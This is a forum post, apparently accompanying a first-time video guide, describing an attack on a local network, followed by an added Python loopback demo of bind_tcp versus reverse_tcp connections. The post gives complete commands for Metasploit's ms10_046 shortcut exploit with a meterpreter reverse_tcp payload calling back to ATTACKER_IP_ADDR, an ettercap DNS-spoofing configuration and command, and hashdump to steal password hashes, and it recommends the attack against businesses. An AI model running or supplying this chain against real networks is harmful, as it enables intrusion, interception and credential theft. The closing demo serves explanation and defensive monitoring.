I realize there are a few mistakes in this video, I was nervous and slipped up. Specifically how reverse_tcp works.

To explain the mistake: I mentioned in the video that reverse_tcp creates a socket on the victim machine and our attacking machine will connect to that socket. This is actually how bind_tcp works. reverse_tcp creates a socket on the attacking machine and lets the victim machine connect as a client. Just wanted to make sure it's clear I know the difference. I realized when I recorded it that I had made a mistake, as you can probably tell by the mumbling, but I just went with it.

I believe that this attack would work really well on medium- and large-sized businesses, if you can get access to the network either via Wi-Fi or by physical means. The redirect to the UNC path looks very scary, but I think most users will chalk it up to terrible IT support or weird phantom network issues.

I appreciate any criticism; this is the first video I've made and really the first time I've posted a guide on here.

Commands:
MSF:
Code:
    use windows/browser/ms10_046_shortcut_icon_dllloader
    set SRVHOST ATTACKER_IP_ADDR
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST ATTACKER_IP_ADDR
    exploit
ettercap:
Code (contents of the etter.dns file, shown with cat):
    cat /usr/share/ettercap/etter.dns
    *.com A 192.168.217.133
    *.net A 192.168.217.133
    *.org A 192.168.217.133
    *.gov A 192.168.217.133
Code:
    ettercap -T -q -i eth0 -P dns_spoof // //
MSF post exploitation:
Code:
    sessions -i 1
    use priv
    hashdump
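The post's correction about bind_tcp versus reverse_tcp is easiest to see by watching which side opens the listening socket. The following Python script is an added example, not the poster's code and not part of Metasploit: it models the two payload types over loopback with a single greeting in each direction (no shell, no command execution). The roles "attacker" and "victim" and the greeting strings are constructed for the demo; the port is chosen by the OS. The point for a defender is in the "outbound_from" field: with reverse_tcp the victim makes an outbound connection to LHOST, which is the direction egress filtering and NetFlow-style monitoring can catch, whereas bind_tcp leaves a new listening port on the victim, which host-based port inventories can catch.

```python
import socket
import threading

# Constructed example: the "attacker" role stands for the machine running the
# Metasploit handler, the "victim" role for the machine running the payload.
# Only the direction of the TCP connection differs between the two payload
# types. Everything runs on loopback.
HOST = "127.0.0.1"


def _serve_one(sock, greeting):
    """Accept one client on an already-listening socket, greet it, read reply."""
    conn, _ = sock.accept()
    with conn:
        conn.sendall(greeting)
        return conn.recv(64)


def _connect_one(port, greeting):
    """Connect to the listener, read its greeting, send ours back."""
    with socket.create_connection((HOST, port), timeout=5) as c:
        received = c.recv(64)
        c.sendall(greeting)
        return received


def run_handshake(payload_type):
    """Model who listens and who connects for a bind_tcp or reverse_tcp
    payload and return a summary dict describing the exchange."""
    if payload_type not in ("bind_tcp", "reverse_tcp"):
        raise ValueError("unknown payload type: %s" % payload_type)

    # bind_tcp: the victim listens (the payload binds LPORT on the victim).
    # reverse_tcp: the attacker's handler listens on LHOST:LPORT and the
    # victim connects out to it.
    listener = "victim" if payload_type == "bind_tcp" else "attacker"
    connector = "attacker" if listener == "victim" else "victim"

    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, 0))  # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    result = {}

    def listener_thread():
        result["listener_got"] = _serve_one(srv, b"hello from " + listener.encode())

    t = threading.Thread(target=listener_thread)
    t.start()
    result["connector_got"] = _connect_one(port, b"hello from " + connector.encode())
    t.join(5)
    srv.close()

    return {
        "payload": payload_type,
        "listens": listener,
        "connects": connector,
        # The connecting side makes the outbound connection. For reverse_tcp
        # that is victim -> LHOST, the direction egress monitoring can flag;
        # for bind_tcp the tell-tale is instead a new listening port on the victim.
        "outbound_from": connector,
        "listener_got": result["listener_got"],
        "connector_got": result["connector_got"],
    }


if __name__ == "__main__":
    for payload in ("bind_tcp", "reverse_tcp"):
        print(run_handshake(payload))
```

Running it prints one summary per payload type; the only difference between the two runs is which role sits behind the listening socket.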